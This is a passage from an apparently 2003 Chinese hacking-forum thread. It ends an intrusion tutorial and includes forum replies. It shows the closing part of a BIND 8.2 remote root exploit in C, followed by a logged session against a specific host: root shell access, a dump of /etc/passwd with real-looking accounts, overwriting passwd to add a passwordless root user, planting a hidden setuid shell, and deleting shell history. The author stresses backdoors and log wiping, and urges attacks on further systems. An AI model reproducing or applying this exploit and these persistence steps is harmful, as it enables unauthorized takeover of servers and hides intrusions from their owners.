memcpy(b,&ptr6,4);b+=4;



cnt-=ofs+28;

for(i=0;i<cnt>>1);i++,b++) *b++=0x01;



memcpy(b,"\x00\x00\x01\x00\x01\x00\x00\xfa\xff",9);b+=9;





if(write(sck[0],buffer,b-buffer)==-1) goto err;

sleep(1);printf("sent!\n");



write(sck[1],"/bin/uname -a\n",14);

while(1){

fd_set fds;

FD_ZERO(&fds);

FD_SET(0,&fds);

FD_SET(sck[1],&fds);

if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){

int cnt;

char buf[1024];

if(FD_ISSET(0,&fds)){

if((cnt=read(0,buf,1024))<1){

if(errno==EWOULDBLOCK||errno==EAGAIN) continue;

else break;

}

write(sck[1],buf,cnt);

}

if(FD_ISSET(sck[1],&fds)){

if((cnt=read(sck[1],buf,1024))<1){

if(errno==EWOULDBLOCK||errno==EAGAIN) continue;

else break;

}

write(1,buf,cnt);

}

}

}

exit(0);

err:

perror("error");exit(-1);

}

^D



# gcc -o bind bind.c -lnsl -lsocket

# ./bind

copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/

bind 8.2 8.2.1 8.2.2 8.2.2PX for slackware 4.0/redhat 6.2 x86



usage: ./bind address [-s][-e]

-s send infoleak packet

-e send exploit packet

#./bind 192.168.0.20 -e

copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/

bind 8.2 8.2.1 8.2.2 8.2.2PX for slackware 4.0/redhat 6.2 x86



stack dump:

42 24 08 08 02 00 b1 ed ca 42 c8 06 95 d0 15 c0

00 cb fa c0 a8 fc ff bf d6 58 08 08 90 3f 0d 08

f4 a4 10 40 16 00 00 00 01 00 00 00 90 3f 0d 08

05 00 00 00 e0 e7 0b 08 16 00 00 00 01 00 00 00

a0 e0 05 08 f4 a4 10 40 c4 fc ff bf 60 e9 0c 08

00 00 00 00 c8 fd ff bf c8 fd ff bf 61 d6 05 08

90 3f 0d 08 bc 76 10 40 b4 11 10 40 14 fe ff bf

01 00 00 00 bc 76 10 40



frame ptr=0xbffffc00 adr=bffffa5e ofs=86 port=e1fa connected! sent!

Linux localhost.localdomain 2.2.14-5.0 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown

Id

uid=0(root) gid=0(root)

cat /etc/passwd

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:

daemon:x:2:2:daemon:/sbin:

adm:x:3:4:adm:/var/adm:

lp:x:4:7:lp:/var/spool/lpd:

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:

news:x:9:13:news:/var/spool/news:

uucp:x:10:14:uucp:/var/spool/uucp:

operator:x:11:0perator:/root:

games:x:12:100:games:/usr/games:

gopher:x:13:30:gopher:/usr/lib/gopher-data:

ftp:x:14:50:FTP User:/home/ftp:

nobody:x:99:99:Nobody:/:

xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false

gdm:x:42:42::/home/gdm:/bin/bash

william:x:500:500:William Wang:/home/william:/bin/bash

www:x:688:501:web user:/home/www:/bin/bash

xeye:x:689:501:Xeye web user:/home/xeye:/bin/bash

td_ftp:x:655:50:TD Bank FTP Client:/home/td_bank:/bin/bash

cyberplex:x:690:100:Cyber:/home/cyberplex:/bin/bash

echo “test::1:0::/:/bin/bash” > /etc/passwd

telnet localhost

Trying 127.0.0.1...

Connected to 127.0.0.1.

Escape character is '^]'.



Red Hat Linux release 6.2 (Zoot)

Kernel 2.2.14-5.0 on an i686

login: isbase

bash$ id

uid=1(bin) gid=0(root) groups=0(root)

bash$ exit

logout

Connection closed by foreign host.

mkdir /usr/lib/…

cp /bin/sh /usr/lib/…/.x

chmod +s /usr/lib/…/.x

exit

#rm –rf /tmp/*.c

#mv bind /usr/lib/…

#mv isbase /usr/lib/…

#mv lpset /usr/lib/…

#mv snmp /usr/lib/…

#cd

#rm –rf .sh_history /.sh_history

#chmod 777 /usr/lib/…

#exit

$exit

-------------------------------------------------test--------------------------------------------------------------





省略了很多,如后门安装和脚印的擦除等。

其实入侵一个系统后更要注意保持自己在系统上的权限,所以清除日志以免被发现,和安放后门以便再次进入这个系统
都是很重要的。

因为以前写过这方面的教程,就不再写了。

大家慢慢提高自己的技术吧。

有时间就去扩散战果,比如Redhat 7.0和该死的freebsd。

自己想办法哦。





肉鸡找回来几台,最后一篇入侵教程总算也写完了,再见啦~

以后也许会写一些技术分析的文章。

大家好运…





(PS:大家如果有看不懂的,也不要给我写信问我。)
发表于 2003-6-11 10:29:39 | 显示全部楼层
好文
发表于 2003-6-12 09:24:57 | 显示全部楼层
现在还是用那么古老的系统的单位我想也该倒了..
发表于 2003-6-13 16:35:48 | 显示全部楼层
厉害,我也要好好学习,早日成为高手,哈哈
发表于 2003-6-16 17:36:43 | 显示全部楼层
强,密码都可以猜到。我估计系统管理员也太菜了。
这个年代还有谁会开telnet?
发表于 2003-6-16 17:54:27 | 显示全部楼层
汗,真是高手。我看我的小命还是难保。
我要学习,再学习。
天,老兄你真历害。
发表于 2003-7-7 09:53:38 | 显示全部楼层
哭,n多都看不懂……
发表于 2003-7-20 10:17:56 | 显示全部楼层
LION2001年的几篇攻击教程中的前两篇,第三篇是关于如何制作后门程序及清除历史记录的,不过,就现在来说如果想找到这边的一些漏洞,已经很难了,而且FINGER开放的也非常非常的少了。
发表于 2004-2-27 20:05:10 | 显示全部楼层
为什么这么喜欢攻击人家的系统。心理不正常??
发表于 2004-2-27 21:32:12 | 显示全部楼层
最初由 777 发表
为什么这么喜欢攻击人家的系统。心理不正常??

多多少少是有一點的
您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表